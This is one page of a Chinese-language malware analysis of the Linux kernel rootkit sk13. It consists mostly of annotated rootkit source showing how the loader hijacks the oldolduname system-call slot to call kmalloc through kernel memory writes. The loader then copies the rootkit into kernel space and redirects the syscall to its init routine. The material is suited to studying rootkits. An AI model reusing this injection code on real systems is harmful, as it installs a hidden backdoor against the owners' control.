首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>病毒分析>文章内容
Linux后门系列--由浅入深sk13完全分析
来源:http://xsec.org 作者:wzt 发布时间:2009-05-04  

           rr("c", __a2));

           return (ulong)__res;
        }

        又根据
        #define    __NR_KMALLOC OURSYS
        #define    OURSYS __NR_oldolduname
        在进一步替换为:

        static inline ulong KMALLOC(ulong __a1,ulong __a2)
        {
           ulong    __res;
           __asm__volatile
           ("int    $0x80"
           : "=a" (__res)
           " "0"(__NR_oldolduname)
               rr("b", __a1)
           rr("c", __a2));

           return (ulong)__res;
        }

        执行KMALLOC(size,gfp),实际是去执行oldolduname系统调用,但我们知道它的地址
        已经被kmalloc的地址替换了,所以就去执行kmalloc,到此,我们已经在内核区域中
        分配了指定大小的空间

        */

       mem = KMALLOC(size, gfp);
       if (!mem) {
          wkml(fd, oldsys, sct + OURSYS * 4);
          printf("FUCK: Out of kernel memory!\n");
          close(fd);
          return 1;
       }

        /* 将sk装入刚才分配的内存中 */

           wkm(fd, (void *) kernel_start,
              (ulong) kernel_end - (ulong) kernel_start,
              mem + SCT_TABSIZE);

        /*
        用kernel_init函数的地址替换掉oldolduname系统调用的地址
        跟KMALLOC同样的道理,调用oldolduname等于调用kernel_init

        */

       wkml(fd, mem + SCT_TABSIZE +
          (ulong) (kernel_init) - (ulong) kernel_start,
          sct + OURSYS * 4);

        /*

        下面是sk所在内核区域内的内存分配示意图

        mem                    kernel_start kernel_init kernel_end
        |                          |             |            |
        V ------> 256 * 4 <--------V             V            V   ----->512*sizeof(pid_struc)
        +------------------------------------------------------------------------------------
        | 新的sys_call_table的数组 |             |            |        PID_TABSIZE          |
        +------------------------------------------------------------------------------------
                                                |
共11页: 上一页 [1] [2] [3] [4] 5 [6] [7] [8] [9] [10] [11] 下一页
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·Word溢出Shellcode分析
·浅谈反病毒技术的前世今生
·Ie0dayCVE0806.c 变种网马样本分
·Web应用漏洞的大规模攻击案例分
·Ie0dayCVE0806网马样本分析
·Witty病毒通过ISS的防火墙产品和
·酷狗音乐首页隐蔽挂马详细分析+7
·Net-Worm.Win32.Dasher(黛蛇)蠕
·熊猫烧香病毒分析与解决方案
·卡巴斯基(AVP)内存驻留型病毒检
·104种木马手工清除方法
·avserve病毒初步分析
  相关文章
·Word溢出Shellcode分析
·酷狗音乐首页隐蔽挂马详细分析+7
·熊猫烧香病毒分析与解决方案
·Ie0dayCVE0806网马样本分析
·Ie0dayCVE0806.c 变种网马样本分
·卡巴斯基(AVP)内存驻留型病毒检
·Net-Worm.Win32.Dasher(黛蛇)蠕
·浅谈反病毒技术的前世今生
·avserve病毒初步分析
·Witty病毒通过ISS的防火墙产品和
·104种木马手工清除方法
·Web应用漏洞的大规模攻击案例分
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved